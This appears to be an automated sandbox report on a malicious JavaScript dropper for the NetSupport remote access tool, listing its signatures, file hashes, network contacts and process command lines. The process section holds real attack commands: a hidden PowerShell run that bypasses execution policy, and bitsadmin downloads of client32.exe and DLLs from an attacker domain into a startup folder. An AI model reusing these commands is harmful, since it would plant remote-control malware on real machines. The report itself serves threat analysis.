Analysis Overview
SHA256
2b04eb3c0f95ecd1e2a5b74275d82ce3d92f8b153774a59fb7243d39b1b56ae9
Threat Level: Known bad
The file ave6608jsjsjsjsjsjsjsjsjs.js was found to be: Known bad.
Malicious Activity Summary
NetSupport
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Drops file in System32 directory
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Download via BitsAdmin
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-07-09 19:19
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2023-07-09 19:19
Reported
2023-07-09 19:23
Platform
win10v2004-20230703-en
Max time kernel
162s
Max time network
177s
Command Line
Signatures
NetSupport
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{EE35E43B-4C55-4094-8443-1411A2B5CF9F}.catalogItem | C:\Windows\System32\svchost.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\svchost.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\System32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\svchost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1584 wrote to memory of 1656 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1584 wrote to memory of 1656 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1656 wrote to memory of 4732 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe |
| PID 1656 wrote to memory of 4732 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe |
| PID 1656 wrote to memory of 4732 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe |
Uses Task Scheduler COM API
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6608jsjsjsjsjsjsjsjsjs.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\rakg3z3.ps1
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe
"C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | virvatulishop.com | udp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.245.44.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | deperekanuki1.com | udp |
| RU | 5.42.74.53:5222 | deperekanuki1.com | tcp |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| GB | 62.172.138.8:80 | geo.netsupportsoftware.com | tcp |
| GB | 62.172.138.8:80 | geo.netsupportsoftware.com | tcp |
| GB | 62.172.138.8:80 | geo.netsupportsoftware.com | tcp |
| US | 8.8.8.8:53 | 53.74.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.138.172.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.150.241.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.148.119.40.in-addr.arpa | udp |
Files
memory/1656-137-0x0000026C5A070000-0x0000026C5A080000-memory.dmp
memory/1656-138-0x0000026C5A070000-0x0000026C5A080000-memory.dmp
memory/1656-141-0x0000026C59F20000-0x0000026C59F42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1e5lhyvm.ylq.ps1
| Hash | Value |
| --- | --- |
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\rakg3z3.ps1
| Hash | Value |
| --- | --- |
| MD5 | 3aca9681a54650494d37d91440ea8a78 |
| SHA1 | eda71218ed383e77a09058002bb0d1ea693a84cf |
| SHA256 | 6f606c666e1fac66c4057174ec83c76d635ea80c7354cc3f3d0871efc8f9a43b |
| SHA512 | 9eba188889a4b1f1dd521d50bf529fe6db4d060ca986d443df6fdb12b79d3c6b2bd63aa4791e441722376b5c2fdebd13cd5c389eb4445da35e3e8a5597fa7d6c |
memory/1656-150-0x0000026C5A070000-0x0000026C5A080000-memory.dmp
memory/1656-151-0x0000026C5C480000-0x0000026C5C494000-memory.dmp
memory/1656-152-0x0000026C5A070000-0x0000026C5A080000-memory.dmp
memory/1656-153-0x0000026C5A070000-0x0000026C5A080000-memory.dmp
memory/1656-154-0x0000026C5C4A0000-0x0000026C5C4B2000-memory.dmp
memory/1656-155-0x0000026C5C470000-0x0000026C5C47A000-memory.dmp
memory/1656-156-0x0000026C5A070000-0x0000026C5A080000-memory.dmp
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe
| Hash | Value |
| --- | --- |
| MD5 | 45fe5531717cd1b9532cbb6a5daaeb3a |
| SHA1 | cb908e267a08c37d7e184f47f788e82cca38f83e |
| SHA256 | ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9 |
| SHA512 | 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb |
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe
| Hash | Value |
| --- | --- |
| MD5 | 45fe5531717cd1b9532cbb6a5daaeb3a |
| SHA1 | cb908e267a08c37d7e184f47f788e82cca38f83e |
| SHA256 | ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9 |
| SHA512 | 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb |
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe
| Hash | Value |
| --- | --- |
| MD5 | 45fe5531717cd1b9532cbb6a5daaeb3a |
| SHA1 | cb908e267a08c37d7e184f47f788e82cca38f83e |
| SHA256 | ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9 |
| SHA512 | 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb |
C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.dll
| Hash | Value |
| --- | --- |
| MD5 | 9c9302e75c25c2ba996efd89a1047205 |
| SHA1 | 9e79627ff32d5abd3382b65a509baeb31c78a7f2 |
| SHA256 | beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1 |
| SHA512 | d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1 |
C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.DLL
| Hash | Value |
| --- | --- |
| MD5 | 9c9302e75c25c2ba996efd89a1047205 |
| SHA1 | 9e79627ff32d5abd3382b65a509baeb31c78a7f2 |
| SHA256 | beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1 |
| SHA512 | d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1 |
C:\Users\Admin\AppData\RoamingOfficeStartup\pcichek.dll
| Hash | Value |
| --- | --- |
| MD5 | 104b30fef04433a2d2fd1d5f99f179fe |
| SHA1 | ecb08e224a2f2772d1e53675bedc4b2c50485a41 |
| SHA256 | 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd |
| SHA512 | 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f |
C:\Users\Admin\AppData\RoamingOfficeStartup\PCICHEK.DLL
| Hash | Value |
| --- | --- |
| MD5 | 104b30fef04433a2d2fd1d5f99f179fe |
| SHA1 | ecb08e224a2f2772d1e53675bedc4b2c50485a41 |
| SHA256 | 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd |
| SHA512 | 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f |
C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll
| Hash | Value |
| --- | --- |
| MD5 | 34dfb87e4200d852d1fb45dc48f93cfc |
| SHA1 | 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641 |
| SHA256 | 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703 |
| SHA512 | f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2 |
C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll
| Hash | Value |
| --- | --- |
| MD5 | 34dfb87e4200d852d1fb45dc48f93cfc |
| SHA1 | 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641 |
| SHA256 | 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703 |
| SHA512 | f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2 |
C:\Users\Admin\AppData\RoamingOfficeStartup\MSVCR100.dll
| Hash | Value |
| --- | --- |
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\RoamingOfficeStartup\msvcr100.dll
| Hash | Value |
| --- | --- |
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\RoamingOfficeStartup\msvcr100.dll
| Hash | Value |
| --- | --- |
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
memory/1656-202-0x0000026C5A070000-0x0000026C5A080000-memory.dmp
C:\Users\Admin\AppData\RoamingOfficeStartup\NSM.LIC
| Hash | Value |
| --- | --- |
| MD5 | b9956282a0fed076ed083892e498ac69 |
| SHA1 | d14a665438385203283030a189ff6c5e7c4bf518 |
| SHA256 | fcc6afd664a8045bd61c398be3c37a97536a199a48d277e11977f93868ae1acc |
| SHA512 | 7daa09113c0e8a36c91cc6d657c65851a20dff6b60ac3d2f40c5737c12c1613c553955f84d131ba2139959973fef9fc616ca5e968cb16c25acf2d4739eed87eb |
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.ini
| Hash | Value |
| --- | --- |
| MD5 | a252f22f61f960c54fa32ae0de7dd17c |
| SHA1 | 00fe1097e70f1f6307e6bc68f40d49abb01dd2d5 |
| SHA256 | a5be7a73bbed8ec4e1a7819289da5412fe9ddf628941aa3b35fbe7454f148618 |
| SHA512 | 7998e6cd43853b77e38cfedf0b6081c2965c9facb891ebd9a33db0e39b71d683f218174d87f99d5ab22983632c4c319bd63ec9dcbf1cbc81a77e3053ae3f1593 |
C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL
| Hash | Value |
| --- | --- |
| MD5 | c94005d2dcd2a54e40510344e0bb9435 |
| SHA1 | 55b4a1620c5d0113811242c20bd9870a1e31d542 |
| SHA256 | 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899 |
| SHA512 | 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a |
C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL
| Hash | Value |
| --- | --- |
| MD5 | c94005d2dcd2a54e40510344e0bb9435 |
| SHA1 | 55b4a1620c5d0113811242c20bd9870a1e31d542 |
| SHA256 | 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899 |
| SHA512 | 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a |
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-09 19:19
Reported
2023-07-09 19:22
Platform
win7-20230705-en
Max time kernel
98s
Max time network
105s
Command Line
Signatures
Enumerates physical storage devices
Download via BitsAdmin
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6608jsjsjsjsjsjsjsjsjs.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\z6ujb7u.ps1
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.exe C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.ini C:\Users\Admin\AppData\RoamingOfficeStartupclient32.ini
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/HTCTL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupHTCTL32.DLL
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/msvcr100.dll C:\Users\Admin\AppData\RoamingOfficeStartupmsvcr100.dll
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/nskbfltr.inf C:\Users\Admin\AppData\RoamingOfficeStartupnskbfltr.inf
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/NSM.LIC C:\Users\Admin\AppData\RoamingOfficeStartupNSM.LIC
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/pcicapi.dll C:\Users\Admin\AppData\RoamingOfficeStartuppcicapi.dll
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/PCICHEK.DLL C:\Users\Admin\AppData\RoamingOfficeStartupPCICHEK.DLL
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/PCICL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupPCICL32.DLL
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/remcmdstub.exe C:\Users\Admin\AppData\RoamingOfficeStartupremcmdstub.exe
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | virvatulishop.com | udp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
Files
memory/3000-60-0x000000001B260000-0x000000001B542000-memory.dmp
memory/3000-61-0x0000000001F40000-0x0000000001F48000-memory.dmp
memory/3000-62-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/3000-63-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/3000-64-0x00000000024E0000-0x0000000002560000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\z6ujb7u.ps1
| Hash | Value |
| --- | --- |
| MD5 | d8d4beafe295f925cf1e7c73667b99cb |
| SHA1 | dc73efce5921033d72bbb09713b347f0e5b6358f |
| SHA256 | 82d78c24842eda98e42ff73b25fd97dd52ed9046c4c5e5200bb2ad760c18f9c3 |
| SHA512 | dfe68905caed73d5d61090598bab5db93e432098e37bf815243b7c031fd4403c3a1fbeab314edc22f466a22de521f8a2fa5bbf27356a958aafd56f2fa9feef21 |
memory/3000-66-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/3000-67-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/3000-68-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/3000-69-0x00000000024E0000-0x0000000002560000-memory.dmp